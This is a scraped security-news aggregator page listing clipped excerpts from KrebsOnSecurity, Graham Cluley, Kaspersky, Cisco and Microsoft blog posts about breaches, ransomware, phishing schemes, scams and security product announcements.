The FSB arrested Tsaregorodtsev, and seized $154,000 in cash, 100 gold bars, real estate and expensive cars.

The stolen customer payment card details were then sold on sites like Trump’s Dumps and Sky-Fraud.

1 week, 4 days ago @ krebsonsecurity.com
Who Stole 3.6M Tax Records from South Carolina?

Rescator said the data exposed included employer, name, address, phone, taxable income, tax refund amount, and bank account number.

KrebsOnSecurity sought comment from the Secret Service, South Carolina prosecutors, and Mr. Keel’s office.

The AP says South Carolina paid $12 million to Experian for identity theft protection and credit monitoring for its residents after the breach.

Mr. Keel’s assertion that somehow the efforts of South Carolina officials following the breach may have lessened its impact on citizens seems unlikely.

It remains unclear why Shefel has never been officially implicated in the breaches at Target, Home Depot, or in South Carolina.

2 weeks, 3 days ago @ krebsonsecurity.com
Crickets from Chirp Systems in Smart Lock Key Leak

The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021.

Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

Neither August nor Chirp Systems responded to requests for comment.

It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state t…

2 weeks, 4 days ago @ krebsonsecurity.com
Why CISA is Warning CISOs About a Breach at Sisense

CISA urged all Sisense customers to reset any credentials and secrets that may have been shared with the company, which is the same advice Sisense gave to its customers Wednesday evening.

It is clear, however, that unknown attackers now have all of the credentials that Sisense customers used in their dashboards.

Beyond that, it is largely up to Sisense customers to decide if and when they change passwords to the various third-party services that they’ve previously entrusted to Sisense.

But when confronted with the details shared by my sources, Sisense apparently changed its mind.

“If they are hosting customer data on a third-party system like Amazon, it better damn well be encrypted,” Weave…

3 weeks ago @ krebsonsecurity.com
Twitter’s Clumsy Pivot to X.com Is a Gift to Phishers

On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead.

Those include carfatwitter.com, which Twitter/X will now truncate to carfax.com when the domain appears in user messages or tweets.

A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan.

The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registr…

3 weeks, 2 days ago @ krebsonsecurity.com
April’s Patch Tuesday Brings Record Number of Fixes

Although to be fair, it would be tough for Microsoft to eclipse the number of vulnerabilities fixed in this month’s patch batch — a record 147 flaws in Windows and related software.

Microsoft today released updates to address 147 security holes in Windows, Office, Azure, .NET Framework, Visual Studio, SQL Server, DNS Server, Windows Defender, Bitlocker, and Windows Secure Boot.

Childs said one of ZDI’s researchers found this vulnerability being exploited in the wild, although Microsoft doesn’t currently list CVE-2024-29988 as being exploited.

“BlackLotus can bypass functionality called secure boot, which is designed to block malware from being able to load when booting up.

Adobe has since clar…

3 weeks, 3 days ago @ krebsonsecurity.com
Fake Lawsuit Threat Exposes Privnote Phishing Sites

Fory66399 insisted that their website — privnote[.

The tornote.io website has a different color altogether. The privatenote,io website also has a different color!

Other Privnote phishing domains that also phoned home to the same Internet address as pirwnote[.

A review of the passive DNS records tied to this address shows that apart from subdomains dedicated to tornote[.

How profitable are these private note phishing sites?

4 weeks, 1 day ago @ krebsonsecurity.com
‘The Manipulaters’ Improve Phishing, Still Fail at Opsec

Since that story ran, KrebsOnSecurity has heard from this Saim Raza identity on two occasions.

“Hello, we already leave that fud etc before year,” the Saim Raza identity wrote.

I already leave everything.” Asked to elaborate on the police investigation, Saim Raza said he was freshly released from jail.

Now I want to start my new work.” Exactly what that “new work” might entail, Saim Raza wouldn’t say.

“After your article our police put FIR on my [identity],” Saim Raza explained.

1 month ago @ krebsonsecurity.com
Thread Hijacking: Phishes That Prey on Your Curiosity

Thread hijacking attacks.

Here’s the story of a recent thread hijacking attack in which a journalist was copied on a phishing email from the unwilling subject of a recent scoop.

Thread hijacking attacks are hardly new, but that is mainly true because many Internet users still don’t know how to identify them.

In contrast, thread hijacking campaigns tend to patiently prey on the natural curiosity of the recipient.

“We call these multi-persona phishing scams, and they’re often paired with thread hijacking,” Kalember said.

1 month ago @ krebsonsecurity.com
Recent ‘MFA Bombing’ Attacks Targeting Apple Users

Several Apple customers recently reported being targeted in elaborate phishing attacks that involve what appears to be a bug in Apple’s password reset feature.

“All of my devices started blowing up, my watch, laptop and phone,” Patel told KrebsOnSecurity.

They can also then remotely wipe all of the user’s Apple devices.

The engineer assured Ken that turning on an Apple Recovery Key for his account would stop the notifications once and for all.

After that, the page will display the last two digits of the phone number tied to the Apple account.

1 month, 1 week ago @ krebsonsecurity.com
Mozilla Drops Onerep After CEO Admits to Running People-Search Networks

The move comes just days after a report by KrebsOnSecurity forced Onerep’s CEO to admit that he has founded dozens of people-search networks over the years.

Mozilla only began bundling Onerep in Firefox last month, when it announced the reputation service would be offered on a subscription basis as part of Mozilla Monitor Plus.

Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned?

“I knew Mozilla had this in the works and we’d casually discussed it when talking about Firefox monitor,” Hunt told KrebsOnSecurity.

Those include voting registries, property filings, marriage certificates, motor vehicle records, criminal records, cou…

1 month, 1 week ago @ krebsonsecurity.com
The Not-so-True People-Search Network from China

But it’s not every day you run across a US-focused people-search network based in China whose principal owners all appear to be completely fabricated identities.

“Employees can set a special league for themselves and regularly check and compare their scores against one another.” Imagine that: Two different people-search companies mentioned in the same story about fantasy football.

Sally Stevens’ LinkedIn profile photo is identical to a stock image titled “beautiful girl” from Adobe.com.

The photo next to Ms. Fairly’s quote in Entrepreneurs matches that of a LinkedIn profile for Lynda Fairly.

ANALYSIS: It appears the purpose of this network is to conceal the location of people in China who are …

1 month, 1 week ago @ krebsonsecurity.com
CEO of Data Privacy Company Onerep.com Founded Dozens of People-Search Firms

The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites.

Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address [email protected].

Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address [email protected].

Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address [email protected].

Anderson said it is concerning to see a direct link between a data removal service and …

1 month, 2 weeks ago @ krebsonsecurity.com
Graham Cluley
last post 1 day, 21 hours ago
Smashing Security podcast #370: The closed loop conundrum, default passwords, and Baby Reindeer

All this and much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Paul Ducklin.

Smashing Security listeners get 20% off!

Support the show: You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us: Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

1 day, 21 hours ago @ grahamcluley.com
“Junk gun” ransomware: the cheap new threat to small businesses


1 week, 1 day ago @ tripwire.com
Hacker posts fake news story about Ukrainians trying to kill Slovak President

Czech news agency ČTK announced on Tuesday that a hacker had managed to break into its systems and published fake news reports of a plot to murder the president of a neighbouring country.

A follow-up fake news story published by the hacker on ČTK's website and mobile app claimed that Czech Foreign Minister Jan Lipavský had commented on the alleged murder plot.

The hacker's haste in publishing false news led to careless mistakes that tipped off readers to its lack of factual basis.

Last year, security researchers described how a hacking group called "Ghostwriter" affiliated with the Belarus government had gained access to media organisations' content management systems to post false stories.…

1 week, 1 day ago @ bitdefender.com
Smashing Security podcast #369: Keeping the lights on after a ransomware attack

All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.


1 week, 1 day ago @ grahamcluley.com
City street lights “misbehave” after ransomware attack

But the ransomware attack on Leicester City Council's infrastructure doesn't stop there.

As local media reports, residents have noticed that some street lights have been constantly shining, 24 hours a day, ever since.

He was told by the council that the ransomware attack had affected the city's "central management system" and had resulted in the street lights "misbehaving".

Perhaps it is surprising to some of us that street lights would be centrally controlled at all.

Even if the Leicester City Council wanted to pay the ransom (it says it will not), …

The City Council says it will not be paying any ransom.

1 week, 2 days ago @ bitdefender.com
Change Healthcare data for sale on dark web as fallout from ransomware attack spirals out of control

February's crippling ransomware attack against Change Healthcare, which saw prescription orders delayed across the United States, continues to have serious consequences.

RansomHub claims 4TB of stolen data are up for sale to the highest bidder unless Change Healthcare pays a ransom.

The haul is said to also contain contracts and legal agreements between Change Healthcare and its business partners.

The ransomware attack was initially attributed to the BlackCat ransomware gang (also known as ALPHV).

None of which is good news, and raises an interesting question - how will Change Healthcare respond to the latest ransom demand?

2 weeks, 1 day ago @ bitdefender.com
3.5 million Omni Hotel guest details held to ransom by Daixin Team

The international hotel chain Omni Hotels & Resorts has confirmed that a cyberattack last month saw it shut down its systems, with hackers stealing personal information about its customers.

According to the firm, it took eleven days to restore systems across its properties, with staff working "tirelessly around the clock."

Omni Hotels hasn't shared details of the specific nature of the cyberattack in its official advisory, but it resembles a ransomware attack.

Sure enough, a ransomware group called the Daixin Team has claimed responsibility.

Daixin Team has been responsible for a number of high-profile attacks.

2 weeks, 1 day ago @ exponential-e.com
Police smash LabHost international fraud network, 37 arrested


2 weeks, 1 day ago @ tripwire.com
Smashing Security podcast #368: Gary Barlow, and a scam turns deadly

All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Bitwarden is an open source password manager trusted by millions of individuals, teams, and organizations worldwide for secure password storage and sharing.


2 weeks, 1 day ago @ grahamcluley.com
Zambia arrests 77 people in swoop on “scam” call centre

Law enforcement officers in Zambia have arrested 77 people at a call centre company they allege had employed local school-leavers to scam internet users around the world.

According to Zambian authorities, Chinese-run Golden Top Support Services, based in an upmarket area of capital city Lusaka, recruited Zambian youths between the ages of 20-25, who believed they were being hired as call centre agents.

Please the people of Zambia report to us every time you are scammed.

Six properties linked to the company at the centre of the investigation have also been seized by authorities, including a luxury lakeside residence.

17 Zambian suspects have since been released, but the remainder o…

2 weeks, 4 days ago @ bitdefender.com
East Central University suffers BlackSuit ransomware attack

The East Central University (ECU) of Ada, Oklahoma, has revealed that a ransomware gang launched an attack against its systems that left some computers and servers encrypted and may have also seen sensitive information stolen.

In an advisory posted on its website, ECU claims that the BlackSuit ransomware gang was unsuccessful in taking down the university's critical services but was "able to conduct a successful attack on a variety of campus computers."

This is far from the first time the BlackSuit ransomware has targeted the education sector.

The BlackSuit ransomware gang most recently claimed responsibility for a cyber attack against California's Select Education Group, having compromise…

3 weeks, 1 day ago @ bitdefender.com
DragonForce ransomware – what you need to know


3 weeks, 1 day ago @ tripwire.com
When a breach goes from 25 documents to 1.3 terabytes…

But on Wednesday April 3, Leicester City Council confirmed that about 25 documents had been shared online by attackers, including people’s confidential information.

And the council described the data breach as a “very serious matter.” Well, yes, it is serious if malicious hackers steal 25 documents.

But now we know that Leicester City Council’s attackers didn’t limit themselves to 25 documents.

The latest FAQ from the council reveals that a gobsmacking 1.3 terabytes of data was stolen during the data breach and published on the dark web.

If 25 documents stolen is “very serious,” I’m not sure the words exist to describe 1.3 terabytes of leaked data…

3 weeks, 1 day ago @ grahamcluley.com
Smashing Security podcast #367: WhatsApp at Westminster, unhealthy AI, and Drew Barrymore

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by John Hawes.


3 weeks, 1 day ago @ grahamcluley.com
Targus business operations disrupted following cyber attack

Targus, the well-known laptop bag and case manufacturer, has been hit by a cyber attack that has interrupted its normal business operations.

In short, in order to lock the bad guys out of its network, Targus has been forced to disable large parts of its infrastructure.

The one question everyone probably has right now is - so, was this a ransomware attack?

Without SEC regulations that came into effect late last year, we might not have known so quickly about the problems Targus was experiencing.

At the time of writing, no hacking groups have publicly claimed responsibility for the attack against Targus.

3 weeks, 2 days ago @ bitdefender.com
Companies 🏢
Kaspersky Blog
last post 1 day, 6 hours ago
Dropbox Sign e-signature service hacked | Kaspersky Blog

The Dropbox Sign breach: how it happened and what ultimately leaked. Unidentified attackers managed to compromise a Dropbox Sign service account and thereby gain access to an internal automated configuration tool for the platform.

As a protective measure, Dropbox reset the passwords of all Dropbox Sign accounts and terminated all active sessions, so users will have to log in to the service again and set a new password in the process.

Dropbox Sign, formerly known as HelloSign, is a separate Dropbox tool for cloud-based document workflows, primarily for signing electronic documents.

As the company emphasizes in its statement, the Dropbox Sign infrastructure is “to a significant deg…

1 day, 6 hours ago @ kaspersky.ru
How Kaspersky Lab stores passwords | Kaspersky Blog

How we check your data. We check whether your data and passwords have been compromised in three ways: by email address, for users of Kaspersky Standard, Kaspersky Plus and Kaspersky Premium.

Why storing passwords in Kaspersky Password Manager is easier and safer. Memorizing all your passwords, or keeping them in a notes app, for example, is insecure.

It creates, stores and automatically fills in strong, unique passwords on websites and in apps, checks whether they have been compromised, and generates two-factor authentication codes.

But how, then, do we check your passwords and look them up in leak databases?

And also, just imagine, on many services, including Kaspersk…

1 day, 11 hours ago @ kaspersky.ru
Kaspersky Thin Client 2.0 OS update | Kaspersky Blog

That is exactly the operating system, Kaspersky Thin Client 2.0, that we propose using in devices for connecting to virtual desktop infrastructure.

What is Kaspersky Thin Client, and what does version 2.0 have to boast about?

In essence, Kaspersky Thin Client 2.0 is an updated operating system for thin clients, built in accordance with the Cyber Immune approach and therefore requiring no add-on protection tools.

Kaspersky Thin Client is based on our KasperskyOS, which minimizes the risk of its compromise even in the case of sophisticated attacks.

Kaspersky Thin Client 2.0 also supports connecting to individual business applications based on Microsoft Remote Desktop S…

1 week, 1 day ago @ kaspersky.ru
Toncoin cryptocurrency scam on Telegram | Kaspersky Blog

Today we describe a fraudulent “earn with Toncoin” scheme; Toncoin is a cryptocurrency built on Telegram technologies.

Stage one: get ready. To begin with, the scammers suggest registering a crypto wallet in an unofficial Telegram bot for storing crypto, and then entering the details of the newly created wallet in the “earning” bot, where the earning is done by buying boosters.

Next, following the scammers' instructions, the victim has to buy 5.5–501 Toncoin (TON), where one TON is worth roughly five to six dollars at the current rate.

The pricier the plan, the higher the commission percentage: a “bike” costs five Toncoin and yields a 30% commission, a “rocket” costs 500 TON and yields 70%.

After that, as the scammers intend, the victim mu…

1 week, 2 days ago @ kaspersky.ru
Content filtering in KSMG 2.1 | Kaspersky Blog

As a result, a huge number of confirmations, account activation links and similar emails land in the mailbox.

In particular, in the cited example of an attack through registration mechanisms, the operator can block emails whose Subject field contains the word “registration” in various languages (Registrace | Registracija | Registration | Registrierung | Regisztráció).

As a result, such emails will be sent to quarantine automatically, without reaching the Inbox folder or overloading the mail server.

Flexible filtering of business mailings. Of course, the new capabilities of our solution can be applied not only to protection against email DDoS attacks.

Learn more about Kaspersky Secure Mail Gateway, part of the solution…

1 week, 3 days ago @ kaspersky.ru
How encrypted messages from ChatGPT and other chatbots can be read | Kaspersky Blog

What information can be extracted from intercepted messages of AI-based chatbots. Naturally, chatbots send their messages in encrypted form.

To understand what happens during this attack, we will have to dig a little into the mechanics of LLMs and chatbots.

So, to then recover the text of the original message from the resulting sequence of token lengths, the researchers used an LLM.

At least two developers of AI chatbots, Cloudflare and OpenAI, have already responded to the publication of the research and started using the padding method mentioned above, which was devised precisely to counter attacks of this kind.

Presumably, the remaining chatbot developers …

1 week, 4 days назад @ kaspersky.ru
The SubdoMailing campaign: domain hijacking for spam distribution | Kaspersky Blog

Perhaps you have even asked the natural question of whether someone is sending malicious emails in your company's name.

The SubdoMailing malicious campaign and hijacking of organizations' domains
Researchers at Guardio Labs discovered a large-scale spam campaign, which they named SubdoMailing.

Hijacking domains with a configured CNAME record
How exactly do the attackers use the takeover of other people's domains?

Examples of domain hijacking in the SubdoMailing campaign
How such problems can arise at all is easy to understand from the case of the site msnmarthastewartsweeps.com.

How to protect against SubdoMailing
To prevent domain hijacking and spam sent in your company's name, we recommend the following:

2 weeks, 2 days ago @ kaspersky.ru
Is it safe to message third-party messengers from WhatsApp | Kaspersky Blog

Meta* engineers recently wrote about how this interoperability will be implemented in WhatsApp and Messenger*.

Can you chat in WhatsApp with users of other messengers?

Now those partners have to appear, build a bridge between their service and WhatsApp, and launch it.

So far this is known only from WhatsApp beta versions: conversations with third-party services will get a separate subsection in the app, to keep them apart from chats with WhatsApp users.

If you use WhatsApp and are considering communicating with users of other services
Assess how many people around you do not use WhatsApp but do use other services that have announced interoperability with WhatsApp.

2 weeks, 3 days ago @ kaspersky.ru
EM Eye: stealing data from a surveillance camera | Kaspersky Blog

They found a way to steal data from surveillance cameras by analyzing spurious electromagnetic emissions, and named this attack EM Eye.

This "receiver" collects data whose subsequent processing makes it possible to reconstruct the picture from the surveillance camera in the secret room next door.

As a result, a state of "almost nothing visible" turns into a fine image, no worse than the original, except for the artifacts typical of neural networks.

But what if the potential victim were given, say, a slightly modified portable power bank as a gift?

They are not being developed in order to spy on someone as early as tomorrow.

3 weeks ago @ kaspersky.ru
Eliminating business risks associated with residential proxies

Of course, all of this can be done using commercial VPNs and data-center-based proxies.

The gray market of proxyware
The situation with residential proxies is complicated because on this market the sellers, the buyers and the participants can be either entirely legitimate (voluntary, following best practices) or outright illegal.

Sometimes this is because some residential proxy providers buy infrastructure from subcontractors and themselves do not know where the proxies come from.

Attackers are increasingly trying to rent residential proxies in a region close to the office of the targeted organization.

Using proxies for business purposes.

3 weeks, 2 days ago @ kaspersky.ru
How to verify the authenticity and origin of photos and videos | Kaspersky Blog

Image forgery in photo editors existed before, but the advent of generative AI has taken forgeries to a new level.

Forgery of images and videos is directly related to cybersecurity.

On dating sites and other social networks, scammers also actively use generated images for their profiles.

Let's start with cases where the image is neither generated nor edited, for example a real shot from a war zone is passed off as a photo from another region, or a frame from a feature film is presented as documentary footage.

Real photos and videos taken by a camera or smartphone, with date, time and geolocation stamps, will be almost impossible to pass off as an image…

3 weeks, 3 days ago @ kaspersky.ru
Note and record managers with end-to-end encryption | Kaspersky Blog

And after the large-scale ransomware incidents of recent years, one should not dismiss the possibility of note services being hacked and of a mass leak of users' (your!)

End-to-end encryption will help keep all the conveniences of digital notes while protecting them from prying eyes.

That is why, for truly confidential notes, there are separate, albeit less well-known, applications, which we will review and compare today.

End-to-end encryption for synchronization is enabled by default, notes are encrypted on the device itself as well, and two-factor authentication is used to sign in to the service.

Therefore, in addition to one of the confidential note-taking apps, be sure to use a comprehensive system…

4 weeks ago @ kaspersky.ru
How to prevent tracking via ad banners | Kaspersky Blog

Besides phones and computers, smartwatches, smart TVs and speakers, and even cars take part in this.

As it turns out, these troves of information are used not only by advertising agencies to offer you a better vacuum cleaner or insurance policy.

Behind the scenes of contextual advertising
Earlier we described in detail how data is collected on web pages and in apps, but paid no attention to the mechanism of its use.

The DSP then bids in an auction for the required ad formats (banner, video and the like) displayed on those sites and in those apps.

How to protect against tracking via advertising
Since all the companies described above use the "central hubs" of the advertising network for data collection, the big ad ex…

1 month ago @ kaspersky.ru
Hackers disrupted an Apex Legends esports tournament | Kaspersky Blog

But lately cyberattacks have gone too far: recently, attackers disrupted a major Apex Legends tournament.

At the same time, the likely culprit did not specify where the vulnerability was: in the Apex Legends game itself, in the Easy Anti-Cheat software that is mandatory for esports tournaments, or in some other program.

Representatives of the anti-cheat stated that their software is fine.

In the middle of a match, Ivan opened the Twitch stream of his own game; this could give him an advantage, since the stream shows the positioning of both teams.

Skeptics also like to cite examples where, at the most important moment of a game, an annoying antivirus notification popped up on the screen.

1 month ago @ kaspersky.ru
The Beekeeper: cybersecurity and the beekeeper | Kaspersky Blog

I know it sounds absurd, but that is the plot of the film; it is not an April Fools' joke.

And in the daughter's place it would have been sensible to install a reliable security solution on the computer in advance, one that protects against viruses and blocks windows that suddenly pop up.

Besides weapons and ammunition, Clay also obtains her password (DR07Z, printed on a piece of paper) and penetrates the beekeepers' information systems.

The EternalBlue exploit and DoublePulsar backdoor used in it were allegedly stolen from intelligence agencies and released publicly.

So you should be prepared for anything and use reliable protective tools both on personal devices and to protect companies.

1 month ago @ kaspersky.ru
Group-IB Blog
last post None
Cisco Security Blog
last post 2 weeks, 1 day ago
Cisco Hypershield: Reimagining Security

Cisco has created such a fabric — Cisco Hypershield — that we discuss in the paragraphs below.

Virtual/Container Network Enforcement Point: Here, a software network enforcement point runs inside a virtual machine or container.

Centralized security policy
The usual retort to distributed security enforcement is the nightmare of managing independent security policies per enforcement point.

The administrator’s faith in the security fabric — Cisco Hypershield — deepens after a few successful runs through the segmentation process.

Conclusion
In both the examples discussed above, we see Cisco Hypershield function as an effective and efficient security fabric.

2 weeks, 1 day ago @ blogs.cisco.com
Cisco Hypershield: A New Era of Distributed, AI-Native Security

I’m proud to announce Cisco Hypershield, the first truly distributed, AI-native system that puts security wherever it needs to be: in every software component of every application running on your network; on every server; and in your public or private cloud deployments.

They converted these products into thousands of pieces of software — including security software — that could run on every server.

Built within the Cisco Security Cloud, Hypershield, plus the processing, protection, and data capabilities within Splunk, will create a transformative hyperscale datacenter that not only leads the AI revolution, but protects it.

We’ll share more soon, but for now, you can expect Cisco Hypershield…

2 weeks, 1 day ago @ blogs.cisco.com
Supercharging Cisco XDR with AI and Identity Intelligence at RSAC 2024

Cisco XDR is a leader in providing comprehensive threat detection and response across the entire attack surface.

Cutting-Edge Innovations in Cisco XDR
At the heart of these innovations is the Cisco AI Assistant in XDR.

The Cisco AI Assistant gives analysts contextual insights, guided responses, and best next steps.

We will also show Cisco Identity Intelligence capabilities.

Cisco XDR can detect and respond to sophisticated identity-based attacks with accuracy and speed by incorporating identity as a source of telemetry.

2 weeks, 2 days ago @ blogs.cisco.com
Synergizing Advanced Identity Threat Detection & Response Solutions

Two leading players in this space, Cisco’s Duo Security and Cisco Identity Intelligence, have emerged as champions in Identity Threat Detection & Response.

The Power of Identity Threat Detection & Response
Identity Threat Detection & Response (ITDR) has become a vital aspect of modern cybersecurity.

Cisco Identity Intelligence: Elevating Cybersecurity Preparedness
Cisco Identity Intelligence brings an additional layer of protection to the table with its advanced capabilities in anomaly detection and behavioral analytics.

How Cisco Identity Intelligence Complements Cisco’s Duo Security
Enhanced Anomaly Detection: While Cisco’s Duo Security provides robust MFA and access controls, Cisco Identity…

2 weeks, 3 days ago @ blogs.cisco.com
Cisco Telemetry Broker (CTB) 2.1 Launch

Cisco Telemetry Broker (CTB) Release 2.1.3 is generally available as of March 25, 2024.

Cisco Telemetry Broker is the answer.

It can broker hybrid cloud data, filter unneeded data, and transform data into a more usable format.

Produces Telemetry for Devices that Cannot Generate NetFlow Natively
To support the notion of an intelligent telemetry plane, there is a need to generate NetFlow for devices that might not be capable of generating the protocol natively.

Additionally, the CTB Broker to CTB Manager data bandwidth was optimized which improves overall performance significantly and allows scalability of the Manager node.

2 weeks, 4 days ago @ blogs.cisco.com
Cisco Secure Access Wins Global Security Service Edge Customer Value Leadership Award

It’s one thing to claim leadership in cloud security; it’s another to have that leadership acknowledged by industry experts.

That’s why we’re thrilled to announce our recent recognition by Frost & Sullivan as the 2024 Customer Value Leader in the Global Security Service Edge Industry.

Frost & Sullivan’s Customer Value Leadership Award recognizes the company that offers products or services customers find superior for the overall price, performance, and quality.

Vendors are evaluated on business impact criteria (including financial performance, customer acquisition, operational efficiency, growth potential, and human capital) and customer impact criteria (price/performance value, customer pu…

3 weeks, 1 day ago @ blogs.cisco.com
Defusing the threat of compromised credentials

These attackers used compromised credentials to repeatedly attempt to sign in to the company’s real Microsoft 365 page, triggering the series of MFA notifications—an attack technique known as MFA exhaustion.

According to this quarter’s Talos IR report, using compromised credentials on valid accounts was one of two top initial access vectors.

How credentials are compromised
Phishing, while one of the most popular methods, isn’t the only way that attackers gather compromised credentials.

Reducing the impact of compromised credentials
It goes without saying that protecting credentials from being compromised and abused is important.

To illustrate, let’s look at when the threat actor begins hammer…

3 weeks, 3 days ago @ blogs.cisco.com
Cryptocurrency and Blockchain security due diligence: A guide to hedge risk

Blockchain security, by its very nature, often diverges from standard cybersecurity practices originating from its decentralized, immutable, and cryptographic nature.

The hashrate originates from the processing power of validator nodes that lend their computational power to validate and secure blockchain transactions.

There are four main types of blockchains:
Public: Anyone can read and write (transact) on a public blockchain such as Bitcoin.

In evaluating blockchain risk levels, public blockchains typically present the lowest risk.

Proof-of-work is extensively used in cryptocurrency and is generally a secure method for validating blockchain transactions.

1 month ago @ blogs.cisco.com
Balancing agility and predictability to achieve major engineering breakthroughs

Let’s look at this from the lens of a customer-impacting factor that may make security operations less predictable: security incidents.

According to our latest Security Outcomes Report:
According to our 2024 Cybersecurity Readiness Index, 54% of organizations said they have experienced a cybersecurity incident in the last 12 months.

The latest Security Outcomes Report shows preventing incidents and mitigating losses are the top priorities for security resilience overall.

Ensuring leadership is aligned with the organization’s approach to balancing agility and predictability.

In our goal to balance agility with predictability, we have implemented some specific aspects to processes that work be…

1 month, 1 week ago @ blogs.cisco.com
Hiding in Plain Sight: How Subdomain Attacks Use Your Email Authentication Against You

For years, analysts, security specialists, and security architects alike have been encouraging organizations to become DMARC compliant.

These attacks were initially reported by Guardio Labs, which reported the discovery of 8,000 domains and 13,000 subdomains being used for these types of attacks since 2022.

In the customer’s instance of Red Sift OnDMARC, they noticed email was coming from a sender with a poor reputation and a subdomain that appeared unrelated to their customer’s main domain.

But these emails had fully passed SPF checks with the customer’s current SPF record.

If you’re a Cisco Secure Email customer, find out how you can quickly add Red Sift domain protection to your security su…

1 month, 1 week ago @ blogs.cisco.com
Introducing Cisco XDR Playbooks: Finding the balance in automating and guiding incident response

In Cisco XDR, “Playbooks” are the strategic guides for robust incident response, designed to streamline the identify, contain, and eradicate processes for cyber threats.

The Playbook Editor
When you open the Editor for the first time, only the Cisco Managed Incident Playbook is displayed and is designated as the “Default” Playbook.

If the Incident does not match any rules assigned to playbooks, the default playbook is assigned to the Incident.

Once a playbook is assigned to an Incident, that assignment cannot be changed, even if the playbook is edited.

In this blog post, we have discussed the evolution and significance of Cisco XDR in standardizing the incident response process, enha…

1 month, 1 week ago @ blogs.cisco.com
Cisco and Nvidia: Redefining Workload Security

Cisco Secure Workload allows enterprise customers to proactively microsegment their applications in an infrastructure, location, and form factor agnostic manner.

With Cisco Secure Workload 3.9, we introduced the Nvidia Bluefield DPU integration which allows the offloading of Secure Workload Agent functionality from hosts to Nvidia Bluefield DPUs.

Under the hood, the control plane logic of the Cisco Secure Workload agent operates on the ARMv8+ CPUs.

Cisco Secure Workload – Nvidia DPU integration fosters a flexible deployment approach which reduces organizational barriers, greatly enhances practitioner experiences, and accelerates the time to value.

Cisco Secure Workload tackles the complexit…

1 month, 2 weeks ago @ blogs.cisco.com
Cisco Secure Access named Leader in Zero Trust Network Access

Zero Trust Network Access (ZTNA) is a critical component to increase productivity and reduce risk in today’s hyper-distributed environments.

Cisco Secure Access provides a modern form of zero trust access that utilizes a new architecture to deliver a unique level of security and user convenience.

We’re proud to announce that our innovative security service edge (SSE) solution, Cisco Secure Access, has been named an Overall Leader in the KuppingerCole Zero Trust Network Access (ZTNA) Leadership Compass.

Recognizing the shift towards distributed and hybrid work models, Cisco Secure Access is engineered to modernize cybersecurity strategies, enabling organizations to implement zero trust with …

1 month, 2 weeks ago @ blogs.cisco.com
Sign up for a Tour at the RSA Conference 2024 SOC

Join the guided tour outside the Security Operations Center, where we’ll discuss real time network traffic of the RSA Conference, as seen in the NetWitness platform.

Engineers will be using Cisco Security Cloud in the SOC, comprised of Cisco Breach Protection Suite, User Protection Suite, Cloud Protection Suite and Secure Firewall.

Please fill out the RSAC SOC Tour Request Form to request your spot.

Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

1 month, 2 weeks ago @ blogs.cisco.com
Complexity drives more than security risk. Secure Access can help with that too.

In response, organizations have adopted security service edge (SSE) solutions, such as Cisco Secure Access, to protect users regardless of where they are located or what they are accessing.

Experience insights is a core component of Secure Access, which means all its data and alerts are provided in the same management portal as the rest of Secure Access’ capabilities.

In addition, all Secure Access capabilities, including Experience Insights, rely on the Cisco Secure Client, a single agent on the end-user’s machine.

Experience insights is just one capability of an incredible solution
While experience insights is our latest announcement, Secure Access includes many capabilities, including a s…

1 month, 2 weeks ago @ blogs.cisco.com
Microsoft Security
last post 1 day, 7 hours ago
Microsoft introduces passkeys for consumer accounts

Today, we’re announcing passkey support for Microsoft consumer accounts, the next step toward our vision of simple, safe access for everyone.

Starting today, you can use a passkey to access your Microsoft account using your face, fingerprint, or device PIN on Windows, Google, and Apple platforms.

Creating a passkey for your Microsoft account
Creating a passkey for your Microsoft account is easy.

Signing into your Microsoft account using a passkey
When you sign in to your Microsoft account, you can use your passkey by choosing Sign-in options and then selecting face, fingerprint, PIN, or security key.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news an…

1 day, 7 hours ago @ microsoft.com
Microsoft named overall leader in KuppingerCole Leadership Compass for ITDR

This blog was co-authored by Alex Weinert, VP Identity Security and Ramya Chitrakar, CVP Apps and Identity.

Today we are thrilled to announce that Microsoft has been recognized as an overall leader in the KuppingerCole Leadership Compass Identity Threat Detection and Response: IAM Meets the SOC.

Figure 1: ITDR Leadership Compass with Microsoft as a leader
Streamline your identity protection with ITDR and generative AI
At Microsoft, we look at ITDR as a set of capabilities at the intersection of Identity and Access Management (IAM) and Extended Detection and Response (XDR).

Proactively protect your on-premises resources and harden your identity posture: Misconfigurations in identity infrastru…

1 day, 22 hours ago @ techcommunity.microsoft.com
“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps

Microsoft remains committed to working with the security community to share vulnerability discoveries and threat intelligence to protect users across platforms.

We also wish to thank Google’s Android Application Security Research team for their partnership in resolving this issue.

